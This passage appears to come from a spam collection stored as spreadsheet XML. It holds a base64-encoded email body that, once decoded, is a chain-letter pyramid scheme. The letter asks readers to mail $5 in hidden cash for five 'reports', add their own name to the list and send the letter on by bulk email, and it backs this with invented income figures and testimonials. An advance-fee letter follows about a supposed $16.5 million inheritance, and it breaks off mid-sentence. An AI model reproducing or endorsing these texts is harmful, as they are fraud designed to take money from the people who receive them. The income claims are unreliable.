 dGhlIHJld2FyZCEhIQ0KIA0KMS4uLi4gQWZ0ZXIgeW91IGhhdmUgb3JkZXJl
 ZCBhbGwgNSByZXBvcnRzLCB0YWtlIHRoaXMgYWR2ZXJ0aXNlbWVudCBhbmQg
 UkVNT1ZFIHRoZQ0KICAgICAgIG5hbWUgJiBhZGRyZXNzIG9mIHRoZSBwZXJz
 b24gaW4gUkVQT1JUICMgNS4gVGhpcyBwZXJzb24gaGFzIG1hZGUgaXQgdGhy
 b3VnaA0KICAgICAgIHRoZSBjeWNsZSBhbmQgaXMgbm8gZG91YnQgY291bnRp
 bmcgdGhlaXIgZm9ydHVuZS4NCjIuLi4uIE1vdmUgdGhlIG5hbWUgJiBhZGRy
 ZXNzIGluIFJFUE9SVCAjIDQgZG93biBUTyBSRVBPUlQgIyA1Lg0KMy4uLi4g
 TW92ZSB0aGUgbmFtZSAmIGFkZHJlc3MgaW4gUkVQT1JUICMgMyBkb3duIFRP
 IFJFUE9SVCAjIDQuDQo0Li4uLiBNb3ZlIHRoZSBuYW1lICYgYWRkcmVzcyBp
 biBSRVBPUlQgIyAyIGRvd24gVE8gUkVQT1JUICMgMy4NCjUuLi4uIE1vdmUg
 dGhlIG5hbWUgJiBhZGRyZXNzIGluIFJFUE9SVCAjIDEgZG93biBUTyBSRVBP
 UlQgIyAyDQo2Li4uLiBJbnNlcnQgWU9VUiBuYW1lICYgYWRkcmVzcyBpbiB0
 aGUgUkVQT1JUICMgMSBQb3NpdGlvbi4gUExFQVNFIE1BS0UgU1VSRQ0KICAg
 ICAgIHlvdSBjb3B5IGV2ZXJ5IG5hbWUgJiBhZGRyZXNzIEFDQ1VSQVRFTFkh
 DQogDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PQ0KIA0KKioqKiBUYWtlIHRoaXMgZW50aXJlIGxldHRlciwgd2l0aCB0
 aGUgbW9kaWZpZWQgbGlzdCBvZiBuYW1lcywgYW5kIHNhdmUgaXQgb24geW91
 ciBjb21wdXRlci4NCkRPIE5PVCBNQUtFIEFOWSBPVEhFUiBDSEFOR0VTLg0K
 IA0KU2F2ZSB0aGlzIG9uIGEgZGlzayBhcyB3ZWxsIGp1c3QgaW4gY2FzZSBp
 ZiB5b3UgbG9vc2UgYW55IGRhdGEuIFRvIGFzc2lzdCB5b3Ugd2l0aCBtYXJr
 ZXRpbmcNCnlvdXIgYnVzaW5lc3Mgb24gdGhlIGludGVybmV0LCB0aGUgNSBy
 ZXBvcnRzIHlvdSBwdXJjaGFzZSB3aWxsIHByb3ZpZGUgeW91IHdpdGggaW52
 YWx1YWJsZQ0KbWFya2V0aW5nIGluZm9ybWF0aW9uIHdoaWNoIGluY2x1ZGVz
 IGhvdyB0byBzZW5kIGJ1bGsgZS1tYWlscyBsZWdhbGx5LCB3aGVyZSB0byBm
 aW5kIHRob3VzYW5kcw0Kb2YgZnJlZSBjbGFzc2lmaWVkIGFkcyBhbmQgbXVj
 aCBtb3JlLiBUaGVyZSBhcmUgMiBQcmltYXJ5IG1ldGhvZHMgdG8gZ2V0IHRo
 aXMgdmVudHVyZSBnb2luZzoNCk1FVEhPRCAjIDE6IEJZIFNFTkRJTkcgQlVM
 SyBFLU1BSUwgTEVHQUxMWQ0KIA0KPT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT0NCkxldCdzIHNheSB0aGF0IHlvdSBkZWNp
 ZGUgdG8gc3RhcnQgc21hbGwsIGp1c3QgdG8gc2VlIGhvdyBpdCBnb2VzLCBh
 bmQgd2Ugd2lsbCBhc3N1bWUgWW91IGFuZA0KdGhvc2UgaW52b2x2ZWQgc2Vu
 ZCBvdXQgb25seSA1LDAwMCBlLW1haWxzIGVhY2guIExldCdzIGFsc28gYXNz
 dW1lIHRoYXQgdGhlIG1haWxpbmcgcmVjZWl2ZQ0Kb25seSBhIDAuMiUgcmVz
 cG9uc2UgKHRoZSByZXNwb25zZSBjb3VsZCBiZSBtdWNoIGJldHRlciBidXQg
 bGV0cyBqdXN0IHNheSBpdCBpcyBvbmx5IDAuMiUuDQpBbHNvIG1hbnkgcGVv
 cGxlIHdpbGwgc2VuZCBvdXQgaHVuZHJlZHMgb2YgdGhvdXNhbmRzIGUtbWFp
 bHMgaW5zdGVhZCBvZiBvbmx5IDUsMDAwIGVhY2gpLg0KQ29udGludWluZyB3
 aXRoIHRoaXMgZXhhbXBsZSwgeW91IHNlbmQgb3V0IG9ubHkgNSwwMDAgZS1t
 YWlscy4gV2l0aCBhIDAuMiUgcmVzcG9uc2UsIHRoYXQNCmlzIG9ubHkgMTAg
 b3JkZXJzIGZvciByZXBvcnQgIyAxLiAgDQogDQpUaG9zZSAxMCBwZW9wbGUg
 cmVzcG9uZGVkIGJ5IHNlbmRpbmcgb3V0IDUsMDAwIGUtbWFpbA0KZWFjaCBm
 b3IgYSB0b3RhbCBvZiA1MCwwMDAuIE91dCBvZiB0aG9zZSA1MCwwMDAgZS1t
 YWlscyBvbmx5IDAuMiUgcmVzcG9uZGVkIHdpdGggb3JkZXJzLg0KVGhhdCdz
 PTEwMCBwZW9wbGUgcmVzcG9uZGVkIGFuZCBvcmRlcmVkIFJlcG9ydCAjIDIu
 DQogDQpUaG9zZSAxMDAgcGVvcGxlIG1haWwgb3V0IDUsMDAwIGUtbWFpbHMg
 ZWFjaCBmb3IgYSB0b3RhbCBvZiA1MDAsMDAwIGUtbWFpbHMuIFRoZSAwLjIl
 DQpyZXNwb25zZSB0byB0aGF0IGlzIDEwMDAgb3JkZXJzIGZvciBSZXBvcnQg
 IyAzLg0KIA0KVGhvc2UgMTAwMCBwZW9wbGUgc2VuZCBvdXQgNSwwMDAgZS1t
 YWlscyBlYWNoIGZvciBhIHRvdGFsIG9mIDUgbWlsbGlvbiBlLW1haWxzIHNl
 bnQgb3V0Lg0KVGhlIDAuMiUgcmVzcG9uc2UgdG8gdGhhdCBpcyAxMCwwMDAg
 b3JkZXJzIGZvciByZXBvcnQgIzQuIFRob3NlIDEwLDAwMCBwZW9wbGUgc2Vu
 ZCBvdXQNCjUsMDAwIGUtbWFpbHMgZWFjaCBmb3IgYSB0b3RhbCBvZiA1MCww
 MDAsMDAwICg1MCBtaWxsaW9uKSBlLW1haWxzLiBUaGUgMC4yJSByZXNwb25z
 ZSB0byB0aGF0DQppcyAxMDAsMDAwIG9yZGVycyBmb3IgUmVwb3J0ICMgNS4g
 DQogDQpUSEFUJ1MgMTAwLDAwMCBPUkRFUlMgVElNRVMgJDUgRUFDSD0kNTAw
 LDAwMC4wMCAoaGFsZiBtaWxsaW9uKS4NCiANCiAgICAgICAgICAgWW91ciB0
 b3RhbCBpbmNvbWUgaW4gdGhpcyBleGFtcGxlIGlzOg0KIA0KICAgICAgICAg
 ICAgICAgICAgMS4uLi4uICQ1MCArDQogICAgICAgICAgICAgICAgICAyLi4u
 Li4gJDUwMCArDQogICAgICAgICAgICAgICAgICAzLi4uLi4gJDUsMDAwICsN
 CiAgICAgICAgICAgICAgICAgIDQuLi4uLiAkNTAsMDAwICsNCiAgICAgICAg
 ICAgICAgICAgIDUuLi4uLiAkNTAwLDAwMA0KICAgICAgICAgICAgICAgICAg
 R3JhbmQgVG90YWw9JDU1NSw1NTAuMDANCiANCk5VTUJFUlMgRE8gTk9UIExJ
 RS4gR0VUIEEgUEVOQ0lMICYgUEFQRVIgQU5EIEZJR1VSRSBJVCBPVVQhDQpU
 SEUgV09SU1QgUE9TU0lCTEUgUkVTUE9OU0VTIEFORCBOTyBNQVRURVIgSE9X
 IFlPVSBDQUxDVUxBVEUNCklULCBZT1UgV0lMTCBTVElMTCBNQUtFIEEgTE9U
 IE9GIE1PTkVZIQ0KIA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT0NClJFTUVNQkVSIEZSSUVORCwgVEhJUyBJUyBBU1NV
 TUlORyBPTkxZIDEwIFBFT1BMRSBPUkRFUklORyBPVVQNCk9GIDUsMDAwIFlP
 VSBNQUlMRUQgVE8uIERhcmUgdG8gdGhpbmsgZm9yIGEgbW9tZW50IHdoYXQg
 d291bGQgaGFwcGVuIGlmIGV2ZXJ5b25lDQpvciBoYWxmIG9yIGV2ZW4gb25l
 IDR0aCBvZiB0aG9zZSBwZW9wbGUgbWFpbGVkIDEwMCwwMDBlLW1haWxzIGVh
 Y2ggb3IgbW9yZT8gVGhlcmUgYXJlIG92ZXINCjE1MCBtaWxsaW9uIHBlb3Bs
 ZSBvbiB0aGUgSW50ZXJuZXQgd29ybGR3aWRlIGFuZCBjb3VudGluZy4gQmVs
 aWV2ZSBtZSwgbWFueSBwZW9wbGUgd2lsbCBkbw0KanVzdCB0aGF0LCBhbmQg
 bW9yZSEgTUVUSE9EICMgMiA6IEJZIFBMQUNJTkcgRlJFRSBBRFMgT04gVEhF
 IElOVEVSTkVUDQogDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PQ0KQWR2ZXJ0aXNpbmcgb24gdGhlIG5ldCBpcyB2ZXJ5
 IHZlcnkgaW5leHBlbnNpdmUgYW5kIHRoZXJlIGFyZSBodW5kcmVkcyBvZiBG
 UkVFIHBsYWNlcyB0bw0KYWR2ZXJ0aXNlLiBQbGFjaW5nIGEgbG90IG9mIGZy
 ZWUgYWRzIG9uIHRoZSBJbnRlcm5ldCB3aWxsIGVhc2lseSBnZXQgYSBsYXJn
 ZXIgcmVzcG9uc2UuIFdlIHN0cm9uZ2x5DQpzdWdnZXN0IHlvdSBzdGFydCB3
 aXRoIE1ldGhvZCAjIDEgYW5kIE1FVEhPRCAjIDIgYXMgeW91IGdvIGFsb25n
 LiBGb3IgZXZlcnkgJDUgeW91IHJlY2VpdmUsDQphbGwgeW91IG11c3QgZG8g
 aXMgZS1tYWlsIHRoZW0gdGhlIFJlcG9ydCB0aGV5IG9yZGVyZWQuIFRoYXQn
 cyBpdC4gQWx3YXlzIHByb3ZpZGUgc2FtZSBkYXkgc2VydmljZQ0Kb24gYWxs
 IG9yZGVycy4gVGhpcyB3aWxsIGd1YXJhbnRlZSB0aGF0IHRoZSBlLW1haWwg
 dGhleSBzZW5kIG91dCwgd2l0aCB5b3VyIG5hbWUgYW5kIGFkZHJlc3Mgb24N
 Cml0LCB3aWxsIGJlIHByb21wdCBiZWNhdXNlIHRoZXkgY2FuIG5vdCBhZHZl
 cnRpc2UgdW50aWwgdGhleSByZWNlaXZlIHRoZSByZXBvcnQuDQogDQo9PT09
 PT09PT09PSBBVkFJTEFCTEUgUkVQT1JUUyA9PT09PT09PT09PT0NCk9SREVS
 IEVBQ0ggUkVQT1JUIEJZIElUUyBOVU1CRVIgJiBOQU1FIE9OTFkuIE5vdGVz
 OiBBbHdheXMgc2VuZA0KJDUgY2FzaCAoVS5TLiBDVVJSRU5DWSkgZm9yIGVh
 Y2ggUmVwb3J0LiBDaGVja3MgTk9UIGFjY2VwdGVkLiBNYWtlIHN1cmUgdGhl
 IGNhc2ggaXMNCmNvbmNlYWxlZCBieSB3cmFwcGluZyBpdCBpbiBhdCBsZWFz
 dCAyIHNoZWV0cyBvZiBwYXBlci4gT24gb25lIG9mIHRob3NlIHNoZWV0cyBv
 ZiBwYXBlciwNCldyaXRlIHRoZSBOVU1CRVIgJiB0aGUgTkFNRSBvZiB0aGUg
 UmVwb3J0IHlvdSBhcmUgb3JkZXJpbmcsIFlPVVIgRS1NQUlMIEFERFJFU1MN
 CmFuZCB5b3VyIG5hbWUgYW5kIHBvc3RhbCBhZGRyZXNzLg0KIA0KUExBQ0Ug
 WU9VUiBPUkRFUiBGT1IgVEhFU0UgUkVQT1JUUyBOT1cgOg0KPT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NClJFUE9SVCAj
 IDE6ICJUaGUgSW5zaWRlcidzIEd1aWRlIHRvIEFkdmVydGlzaW5nIGZvciBG
 cmVlIG9uIHRoZSBOZXQiDQpPcmRlciBSZXBvcnQgIzEgZnJvbTogDQpCLm8u
 bi5lLnkgQ2FwIA0KU3VpdGUjIDkwOSAtMTAxNzUtMTE0dGggU3RyZWV0IEVk
 bW9udG9uLCBBbGJlcnRhLFQ1ayAyTDQgQ2FuYWRhDQpfX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXw0KUkVQT1JU
 ICMgMjogIlRoZSBJbnNpZGVyJ3MgR3VpZGUgdG8gU2VuZGluZyBCdWxrIGUt
 bWFpbCBvbiB0aGUgTmV0Ig0KT3JkZXIgUmVwb3J0ICMgMiBmcm9tOg0KVmVu
 dHVyZXMgMjAwMQ0KQm94IDQ0NSBTdGF0aW9uIG1haW4gRWRtb250b24uQWxi
 ZXJ0YSxDYW5hZGEgVDVKIDJrMQ0KX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fXw0KUkVQT1JUICMgMzogIlNlY3Jl
 dCB0byBNdWx0aWxldmVsIE1hcmtldGluZyBvbiB0aGUgTmV0Ig0KT3JkZXIg
 UmVwb3J0ICMgMyBmcm9tIDoNCkIuIEcgTWFpbGVycw0KQm94IDExNjEgQ2Ft
 cm9zZSwgQWxCZXJ0YSwgY2FuYWRhIFQ0ViAxWDENCl9fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQpSRVBPUlQg
 IyA0OiAiSG93IHRvIEJlY29tZSBhIE1pbGxpb25haXJlIFV0aWxpemluZyBN
 TE0gJiB0aGUgTmV0Ig0KT3JkZXIgUmVwb3J0ICMgNCBmcm9tOg0KUC5VLkcu
 DQo3OTE5LTExOHRoIFN0cmVldA0KTi5EZWx0YSwgQkMgLCBWNEM2RzksIENh
 bmFkYQ0KX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX18NClJFUE9SVCAjNTogIkhvdyB0byBTYWZlbHkgU2VuZCBU
 d28gTWlsbGlvbiBFbWFpbHMgYXQgVmlydHVhbGx5IE5vIENvc3QiDQpPcmRl
 ciBSZXBvcnQgIyA1IGZyb206DQpLLkwuRyBWZW50dXJlDQpTdWl0ZSMgOTA5
 LTEwMTc1LTExNHRoIFN0cmVldCxFZG1vbnRvbiAsQWxiZXJ0YSwgVDVLIDJM
 NCBDYW5hZGENCg0KDQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 ICAgX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fXw0KJCQkJCQkJCQkIFlPVVIgU1VDQ0VTUyBHVUlERUxJTkVTICQk
 JCQkJCQkJCQkDQogDQpGb2xsb3cgdGhlc2UgZ3VpZGVsaW5lcyB0byBndWFy
 YW50ZWUgeW91ciBzdWNjZXNzOg0KIA0KPT09IElmIHlvdSBkbyBub3QgcmVj
 ZWl2ZSBhdCBsZWFzdCAxMCBvcmRlcnMgZm9yIFJlcG9ydCAjMSB3aXRoaW4g
 MiB3ZWVrcywgY29udGludWUNCiAgICAgICBzZW5kaW5nIGUtbWFpbHMgdW50
 aWwgeW91IGRvLg0KIA0KPT09IEFmdGVyIHlvdSBoYXZlIHJlY2VpdmVkIDEw
 IG9yZGVycywgMiB0byAzIHdlZWtzIGFmdGVyIHRoYXQgeW91IHNob3VsZCBy
 ZWNlaXZlDQogICAgICAgIDEwMCBvcmRlcnMgb3IgbW9yZSBmb3IgUkVQT1JU
 ICMgMi4gSWYgeW91IGRpZCBub3QsIGNvbnRpbnVlIGFkdmVydGlzaW5nIG9y
 DQogICAgICAgIHNlbmRpbmcgZS1tYWlscyB1bnRpbCB5b3UgZG8uDQogDQo9
 PT0gT25jZSB5b3UgaGF2ZSByZWNlaXZlZCAxMDAgb3IgbW9yZSBvcmRlcnMg
 Zm9yIFJlcG9ydCAjMiwgWU9VIENBTiBSRUxBWCwNCiAgICAgICBiZWNhdXNl
 IHRoZSBzeXN0ZW0gaXMgYWxyZWFkeSB3b3JraW5nIGZvciB5b3UsIGFuZCB0
 aGUgY2FzaCB3aWxsIGNvbnRpbnVlIHRvIHJvbGwgaW4gIQ0KICAgICAgIFRI
 SVMgSVMgSU1QT1JUQU5UIFRPIFJFTUVNQkVSOiBFdmVyeSB0aW1lIHlvdXIg
 bmFtZSBpcyBtb3ZlZCBkb3duIG9uIHRoZQ0KICAgICAgIGxpc3QsIHlvdSBh
 cmUgcGxhY2VkIGluIGZyb250IG9mIGEgRGlmZmVyZW50IHJlcG9ydC4gWW91
 IGNhbiBLRUVQIFRSQUNLIG9mIHlvdXINCiAgICAgICBQUk9HUkVTUyBieSB3
 YXRjaGluZyB3aGljaCByZXBvcnQgcGVvcGxlIGFyZSBvcmRlcmluZyBmcm9t
 IHlvdS4gSUYgWU9VIFdBTlQNCiAgICAgICBUTyBHRU5FUkFURSBNT1JFIElO
 Q09NRSBTRU5EIEFOT1RIRVIgQkFUQ0ggT0YgRS1NQUlMUyBBTkQNCiAgICAg
 ICBTVEFSVCBUSEUgV0hPTEUgUFJPQ0VTUyBBR0FJTi4gVGhlcmUgaXMgTk8g
 TElNSVQgdG8gdGhlIGluY29tZSB5b3UgY2FuDQogICAgICAgZ2VuZXJhdGUg
 ZnJvbSB0aGlzIGJ1c2luZXNzICEhIQ0KIA0KPT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkZPTExPV0lORyBJUyBBIE5P
 VEUgRlJPTSBUSEUgT1JJR0lOQVRPUiBPRiBUSElTIFBST0dSQU06IFlvdSBo
 YXZlDQpqdXN0IHJlY2VpdmVkIGluZm9ybWF0aW9uIHRoYXQgY2FuIGdpdmUg
 eW91IGZpbmFuY2lhbCBmcmVlZG9tIGZvciB0aGUgcmVzdCBvZiB5b3VyIGxp
 ZmUsIHdpdGgNCk5PIFJJU0sgYW5kIEpVU1QgQSBMSVRUTEUgQklUIE9GIEVG
 Rk9SVC4gWW91IGNhbiBtYWtlIG1vcmUgbW9uZXkgaW4gdGhlIG5leHQNCmZl
 dyB3ZWVrcyBhbmQgbW9udGhzIHRoYW4geW91IGhhdmUgZXZlciBpbWFnaW5l
 ZC4gRm9sbG93IHRoZSBwcm9ncmFtIEVYQUNUTFkgQVMNCklOU1RSVUNURUQu
 IERvIE5vdCBjaGFuZ2UgaXQgaW4gYW55IHdheS4gSXQgd29ya3MgZXhjZWVk
 aW5nbHkgd2VsbCBhcyBpdCBpcyBub3cuDQogDQpSZW1lbWJlciB0byBlLW1h
 aWwgYSBjb3B5IG9mIHRoaXMgZXhjaXRpbmcgcmVwb3J0IGFmdGVyIHlvdSBo
 YXZlIHB1dCB5b3VyIG5hbWUgYW5kDQphZGRyZXNzIGluIFJlcG9ydCAjMSBh
 bmQgbW92ZWQgb3RoZXJzIHRvICMyIC4uLi4uLi4uLi4uIyA1IGFzIGluc3Ry
 dWN0ZWQgYWJvdmUuIE9uZSBvZiB0aGUNCnxwZW9wbGUgeW91IHNlbmQgdGhp
 cyB0byBtYXkgc2VuZCBvdXQgMTAwLDAwMCBvciBtb3JlIGUtbWFpbHMgYW5k
 IHlvdXIgbmFtZSB3aWxsIGJlDQpvbiBldmVyeSBvbmUgb2YgdGhlbS4NCiAN
 ClJlbWVtYmVyIHRob3VnaCwgdGhlIG1vcmUgeW91IHNlbmQgb3V0IHRoZSBt
 b3JlIHBvdGVudGlhbCBjdXN0b21lciB5b3Ugd2lsbCByZWFjaC4NClNvIG15
 IGZyaWVuZCwgSSBoYXZlIGdpdmVuIHlvdSB0aGUgaWRlYXMsIGluZm9ybWF0
 aW9uLCBtYXRlcmlhbHMgYW5kIG9wcG9ydHVuaXR5IHRvIGJlY29tZQ0KZmlu
 YW5jaWFsbHkgaW5kZXBlbmRlbnQuIElUIElTIFVQIFRPIFlPVSBOT1cgIQ0K
 PT09PT09PT0gTU9SRSBURVNUSU1PTklBTFMgPT09PT09PT09PT09DQoiTXkg
 bmFtZSBpcyBNaXRjaGVsbC4gTXkgd2lmZSwgSm9keSBhbmQgSSBsaXZlIGlu
 IENoaWNhZ28uIEkgYW0gYW4gYWNjb3VudGFudCB3aXRoIGEgbWFqb3INClUu
 Uy4gQ29ycG9yYXRpb24gYW5kIEkgbWFrZSBwcmV0dHkgZ29vZCBtb25leS4g
 V2hlbiBJIHJlY2VpdmVkIHRoaXMgcHJvZ3JhbSBJIGdydW1ibGVkDQp0byBK
 b2R5IGFib3V0IHJlY2VpdmluZyAnJ2p1bmsgbWFpbCcnLiBJIG1hZGUgZnVu
 IG9mIHRoZSB3aG9sZSB0aGluZywgc3BvdXRpbmcgbXkga25vd2xlZGdlDQpv
 ZiB0aGUgcG9wdWxhdGlvbiBhbmQgcGVyY2VudGFnZXMgaW52b2x2ZWQuIEkg
 JydrbmV3JycgaXQgd291bGRuJ3Qgd29yay4gSm9keSB0b3RhbGx5IGlnbm9y
 ZWQNCm15IHN1cHBvc2VkIGludGVsbGlnZW5jZSBhbmQgZmV3IGRheXMgbGF0
 ZXIgc2hlIGp1bXBlZCBpbiB3aXRoIGJvdGggZmVldC4gSSBtYWRlIG1lcmNp
 bGVzcw0KZnVuIG9mIGhlciwgYW5kIHdhcyByZWFkeSB0byBsYXkgdGhlIG9s
 ZCAnJ0kgdG9sZCB5b3Ugc28nJyBvbiBoZXIgd2hlbiB0aGUgdGhpbmcgZGlk
 bid0IHdvcmsuDQpXZWxsLCB0aGUgbGF1Z2ggd2FzIG9uIG1lISBXaXRoaW4g
 MyB3ZWVrcyBzaGUgaGFkIHJlY2VpdmVkIDUwIHJlc3BvbnNlcy4gV2l0aGlu
 IHRoZQ0KbmV4dCA0NSBkYXlzIHNoZSBoYWQgcmVjZWl2ZWQgdG90YWwgJCAx
 NDcsMjAwLjAwIC4uLi4uLi4uLi4uIGFsbCBjYXNoISBJIHdhcyBzaG9ja2Vk
 LiBJIGhhdmUNCmpvaW5lZCBKb2R5IGluIGhlciAnJ2hvYmJ5JycuIE1pdGNo
 ZWxsIFdvbGYgQy5QLkEuLCBDaGljYWdvLCBJbGxpbm9pcw0KPT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQonJ05vdCBiZWlu
 ZyB0aGUgZ2FtYmxpbmcgdHlwZSwgaXQgdG9vayBtZSBzZXZlcmFsIHdlZWtz
 IHRvIG1ha2UgdXAgbXkgbWluZCB0byBwYXJ0aWNpcGF0ZQ0KaW4gdGhpcyBw
 bGFuLiBCdXQgY29uc2VydmF0aXZlIHRoYXQgSSBhbSwgSSBkZWNpZGVkIHRo
 YXQgdGhlIGluaXRpYWwgaW52ZXN0bWVudCB3YXMgc28gbGl0dGxlIHRoYXQN
 CnRoZXJlIHdhcyBqdXN0IG5vIHdheSB0aGF0IEkgd291bGRuJ3QgZ2V0IGVu
 b3VnaCBvcmRlcnMgdG8gYXQgbGVhc3QgZ2V0IG15IG1vbmV5IGJhY2snJy4N
 CicnIEkgd2FzIHN1cnByaXNlZCB3aGVuIEkgZm91bmQgbXkgbWVkaXVtIHNp
 emUgcG9zdCBvZmZpY2UgYm94IGNyYW1tZWQgd2l0aCBvcmRlcnMuDQpJIG1h
 ZGUgJDMxOSwyMTAuMDAgaW4gdGhlIGZpcnN0IDEyIHdlZWtzLiBUaGUgbmlj
 ZSB0aGluZyBhYm91dCB0aGlzIGRlYWwgaXMgdGhhdCBpdCBkb2VzIG5vdA0K
 bWF0dGVyIHdoZXJlIHBlb3BsZSBsaXZlLiBUaGVyZSBzaW1wbHkgaXNuJ3Qg
 YSBiZXR0ZXIgaW52ZXN0bWVudCB3aXRoIGEgZmFzdGVyIHJldHVybiBhbmQg
 c28NCmJpZy4iIERhbiBTb25kc3Ryb20sIEFsYmVydGEsIENhbmFkYQ0KPT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KJydJ
 IGhhZCByZWNlaXZlZCB0aGlzIHByb2dyYW0gYmVmb3JlLiBJIGRlbGV0ZWQg
 aXQsIGJ1dCBsYXRlciBJIHdvbmRlcmVkIGlmIEkgc2hvdWxkIGhhdmUgZ2l2
 ZW4NCml0IGEgdHJ5LiBPZiBjb3Vyc2UsIEkgaGFkIG5vIGlkZWEgd2hvIHRv
 IGNvbnRhY3QgdG8gZ2V0IGFub3RoZXIgY29weSwgc28gSSBoYWQgdG8gd2Fp
 dCB1bnRpbCBJIHdhcw0KZS1tYWlsZWQgYWdhaW4gYnkgc29tZW9uZSBlbHNl
 Li4uLi4uLi4uMTEgbW9udGhzIHBhc3NlZCB0aGVuIGl0IGx1Y2tpbHkgY2Ft
 ZSBhZ2Fpbi4uLi4uLiBJIGRpZA0Kbm90IGRlbGV0ZSB0aGlzIG9uZSEgSSBt
 YWRlIG1vcmUgdGhhbiAkNDkwLDAwMCBvbiBteSBmaXJzdCB0cnkgYW5kIGFs
 bCB0aGUgbW9uZXkgY2FtZSB3aXRoaW4NCjIyIHdlZWtzLiIgU3VzYW4gRGUg
 U3V6YSwgTmV3IFlvcmssIE4uWS4NCj09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09DQonJ0l0IHJlYWxseSBpcyBhIGdyZWF0
 IG9wcG9ydHVuaXR5IHRvIG1ha2UgcmVsYXRpdmVseSBlYXN5IG1vbmV5IHdp
 dGggbGl0dGxlIGNvc3QgdG8geW91LiBJIGZvbGxvd2VkDQp0aGUgc2ltcGxl
 IGluc3RydWN0aW9ucyBjYXJlZnVsbHkgYW5kIHdpdGhpbiAxMCBkYXlzIHRo
 ZSBtb25leSBzdGFydGVkIHRvIGNvbWUgaW4uIE15IGZpcnN0DQptb250aCBJ
 IG1hZGUgJDIwLDU2MC4wMCBhbmQgYnkgdGhlIGVuZCBvZiB0aGlyZCBtb250
 aCBteSB0b3RhbCBjYXNoIGNvdW50IHdhcyAkMzYyLDg0MC4wMC4NCkxpZmUg
 aXMgYmVhdXRpZnVsLCBUaGFua3MgdG8gdGhlIGludGVybmV0LiIuIEZyZWQg
 RGVsbGFjYSwgV2VzdHBvcnQsIE5ldyBaZWFsYW5kDQo9PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KT1JERVIgWU9VUiBS
 RVBPUlRTIFRPREFZIEFORCBHRVQgU1RBUlRFRA0KT04gWU9VUiBST0FEIFRP
 IEZJTkFOQ0lBTCBGUkVFRE9NICENCj09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT0NCklmIHlvdSBoYXZlIGFueSBxdWVzdGlv
 bnMgb2YgdGhlIGxlZ2FsaXR5IG9mIHRoaXMgcHJvZ3JhbSwgY29udGFjdCB0
 aGUgT2ZmaWNlIG9mIEFzc29jaWF0ZQ0KRGlyZWN0b3IgZm9yIE1hcmtldGlu
 ZyBQcmFjdGljZXMsIEZlZGVyYWwgVHJhZGUgQ29tbWlzc2lvbiwgQnVyZWF1
 IG9mIENvbnN1bWVyIFByb3RlY3Rpb24sIFdhc2hpbmd0b24sIEQuQy4NCiAN
 Ck5vdGU6IE91ciBmdWxseSBhdXRvbWF0ZWQgc3lzdGVtIHdpbGwgcmVtb3Zl
 IGlmIHlvdSBzZW5kIGFuIGVtYWlsIHRvIHJtdmhqanNzczc3XzlAeWFob28u
 Y29tIHdpdGggdGhlIHdvcmQgUkVNT1ZFIGluIHRoZSBzdWJqZWN0IGxpbmUu
 DQoNCllvdSBkb24ndCBoYXZlIHRvIHJlcGx5LCB0aGlzIGlzIGEgb25lLXRp
 bWUgdGVzdCBtYWlsaW5nLg0KSSBoYXZlIGEgbmV3IHNpdGU6ICBzb21ld2hl
 cmVvbndlYi5jb20NCg0KWW91IGFyZSB3ZWxjb21lICENCg0KOTc1N0FXRGoz
 LTIxMmpPV2MwMTE3UnBJcDItNjk0Z2JjWDk3NThvSlJkMy02MDVwVlZnMzM5
 Nk9KZUM0LTU4MmNBdEY2OTE3WUdPVTktbDcz
 ------=_NextPart_000_00A6_65D74A6D.D6752B68--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</si>
  <si>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ANTICAIPTING TO HEARING FROM YOU SOON.
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM: KONE BAKAR
 TEL: (+225) 0771 1719.  
 ABIDJAN, IVORY COAST  
 WEST-AFRICA.  
 DEAR,  
 PERMIT ME TO INFORM YOU OF MY DESIRE OF GOING INTO BUSINESS
 RELATIONSHIP  WITH YOU. I GOT YOUR NAME AND CONTACT FROM THE INTERNET
 IN MY SEARCH FOR ASSISTANCE. DUE TO IT'S ESTEEMING NATURE I MUST NOT
 HESITATE TO CONFIDE IN YOU FOR THIS SIMPLE AND SINCERE BUSINESS.  
 I AM KONE BAKAR, THE ONLY CHILD OF LATE MR &amp; MRS. COULIBALY BAKAR. 
 MY FATHER WAS A VERY WEALTHY COCOA MERCHANT BASED IN ABIDJAN, THE
 ECONOMIC CAPITAL OF IVORY COAST BEFORE HE WAS POISONED TO DEATH BY
 HIS BUSINESS ASSOCIATES ON ONE OF THEIR OUTING ON ON A BUSINESS
 MEETINGS.  
 WHEN MY MOTHER DIED ON THE 21ST OCTOBER 1994, MY
 FATHER TOOK ME SO SPECIAL BECAUSE MY MOTHER IS NOW DEAD. BEFORE THE
 DEATH OF MY FATHER ON 29TH JUNE 2000 IN A PRIVATE HOSPITAL HERE IN
 ABIDJAN. HE SECRETLY CALLED ME ON HIS BEDSIDE AND TOLD ME  THAT HE
 HAS A SUM OF US$16,500,000(SIXTEEN MILLION FIVE HUNDRED
 THOUSAND,UNITED STATES DOLLARS) LEFT IN A SUSPENCE ACCOUNT IN A 
 LOCAL BANK HERE IN ABIDJAN, THAT HE USED MY NAME AS HIS ONLY SON FOR
